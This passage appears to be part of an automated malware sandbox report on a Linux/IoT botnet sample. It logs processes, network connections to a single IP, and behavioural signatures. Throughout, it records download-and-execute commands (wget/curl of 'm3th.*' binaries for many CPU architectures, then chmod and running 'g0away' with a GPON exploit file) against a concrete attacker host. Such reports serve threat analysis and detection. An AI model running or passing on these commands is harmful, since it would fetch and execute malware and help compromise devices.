[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]
/bin/cat
[cat m3th.sh4]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]
/bin/cat
[cat m3th.arc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-28 16:40
Reported
2024-07-29 11:10
Platform
debian9-mipsel-20240729-en
Max time kernel
92s
Max time network
93s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
| N/A | /tmp/g0away | /tmp/g0away | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/g0away | /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 | N/A |
Processes
/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
[/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]
/bin/cat
[cat m3th.x86]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM9]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]
/bin/cat
[cat m3th.mips]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM9]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]
/bin/cat
[cat m3th.mpsl]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM9]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]
/bin/cat
[cat m3th.arm]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]
/bin/cat
[cat m3th.arm5]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]
/bin/cat
[cat m3th.arm6]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]
/bin/cat
[cat m3th.arm7]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]
/bin/cat
[cat m3th.ppc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]
/bin/cat
[cat m3th.m68k]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]
/bin/cat
[cat m3th.spc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]
/bin/cat
[cat m3th.i686]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]
/bin/cat
[cat m3th.sh4]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
/usr/bin/wget
[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]
/usr/bin/curl
[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]
/bin/cat
[cat m3th.arc]
/bin/chmod
[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]
/tmp/g0away
[./g0away gpon8080.exploit]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |
| HR | 45.95.168.230:80 | | tcp |